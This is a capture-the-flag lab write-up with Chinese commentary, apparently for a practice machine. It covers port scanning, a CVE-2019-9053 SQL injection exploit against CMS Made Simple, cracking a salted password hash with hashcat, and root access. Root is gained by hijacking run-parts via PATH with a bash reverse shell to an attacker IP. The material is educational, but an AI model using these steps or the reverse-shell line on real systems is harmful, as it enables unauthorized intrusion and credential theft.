Information Gathering
IP Address | Opening Ports |
---|---|
10.10.10.138 | TCP:22,80 |
$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.138 | grep '^[0-9]' | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV 10.10.10.138
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp closed http
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
CMS Made Simple SQLI ; CVE-2019-9053
$ feroxbuster --url http://10.10.10.138
$ whatweb http://10.10.10.138/writeup/index.php -v
$ python2 exp -u http://10.10.10.138/writeup
Username:jkr
Email:[email protected]
Hash:62def4866937f08cc13bab43bb14e6f7
Salt:5a599ef579066807
$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807'>hash
$ hashcat -m 20 -a 0 hash /usr/share/wordlists/rockyou.txt
username:jkr
passwword:raykayjay9
$ ssh [email protected]
User.txt
8c05eec57b840468d15218b7a938f180
Privilege Escalation : Staff Group Path Hijackin
staff 组:允许用户在无需 root 权限的情况下对系统(/usr/local)进行本地修改(请注意,/usr/local/bin 中的可执行文件会包含在所有用户的 PATH 变量中,它们可能会“覆盖” /bin 和 /usr/bin 中同名的可执行文件)。
可对比 adm 组,它更多与监控/安全相关。
监控ROOT用户启动/usr/local/目录中哪个程序
$ wget http://10.10.16.6/pspy32
$ ssh [email protected]
使用 run-parts 执行 /etc/update-motd.d 目录下的脚本。
输出结果被保存到 /run/motd.dynamic.new,作为登录时看到的动态信息。
无法保存脚本到update-motd.d 目录下
由于环境变量/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin依次向右寻找。
结合当前用户可修改/usr/local/bin,/usr/local/sbin,/usr/local/games;我们需要先一步劫持run-parts;/usr/local/sbin
$ echo -e '#!/bin/bash\n\n/bin/bash >& /dev/tcp/10.10.16.6/10011 0>&1' > /usr/local/sbin/run-parts; chmod +x /usr/local/sbin/run-parts
$ ssh [email protected]
Root.txt
803d6f00a18d18dcbd03d8e5abf70eb9
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)